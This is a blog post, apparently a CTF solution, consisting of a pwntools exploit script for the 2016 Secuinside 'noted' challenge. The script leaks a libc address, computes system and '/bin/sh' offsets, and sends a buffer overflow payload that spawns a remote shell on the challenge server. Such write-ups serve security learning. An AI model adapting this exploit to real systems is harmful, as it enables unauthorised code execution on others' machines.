2016 secuinside noted
by St1tch
from pwn import *
import stitch
local = False
if local :
s = remote('localhost', 9999)
offset = {'read35' : 0xd5c23, 'system' : 0x3ad80, 'binsh' : 0x15ba3f}
raw_input('ready!')
else :
s = remote('chal.cykor.kr', 20003)
offset = {'read35' : 0xd4443, 'system' : 0x3a920, 'binsh' : 0x15909f}
def reg_login(menu, myid, mypw) :
global s
s.recvuntil('\n\n')
s.sendline(menu)
s.recvuntil(' : ')
s.sendline(myid)
s.recvuntil(' : ')
s.sendline(mypw)
def n_write(title, d_len, pw) :
global s
s.recvuntil('\n\n')
s.sendline('2')
s.recvuntil(' : ')
s.sendline(title)
s.recvuntil(' : ')
s.sendline(d_len)
s.recvuntil(' : ')
s.sendline(pw)
log.info('Write note! %s'%title)
def n_edit(title, title_pw, payload) :
global s
s.recvuntil('\n\n')
s.sendline('4')
s.recvuntil(' : ')
s.sendline(title)
s.recvuntil(' : ')
s.sendline(title_pw)
stack = s.recvuntil('size) : ')
s.sendline(payload)
log.info('Edit note! %s'%title)
if payload :
log.info('Exploit!')
s.interactive()
return stack
if __name__ == '__main__' :
myid = mypw = 'stitch'
title = title_pw = 'ukuk'
reg_login('2', myid, mypw) #register
reg_login('1', myid, mypw) #login
log.info('login %s'%myid)
n_write(title, '-1', title_pw)
#lick
stack = n_edit(title, title_pw, '')
#stitch.dump_str(stack)
ebp = stack.find('uk') + 136
read35 = u32(stack[ebp-4:ebp])
d_offset = read35 - offset['read35']
system = d_offset + offset['system']
binsh = d_offset + offset['binsh']
#send payload and exploit
pay = 'a' * 1164
pay += p32(system)
pay += 'a' * 4
pay += p32(binsh)
n_edit(title, title_pw, pay)
블로그의 정보
튜기's blogg(st1tch)
St1tch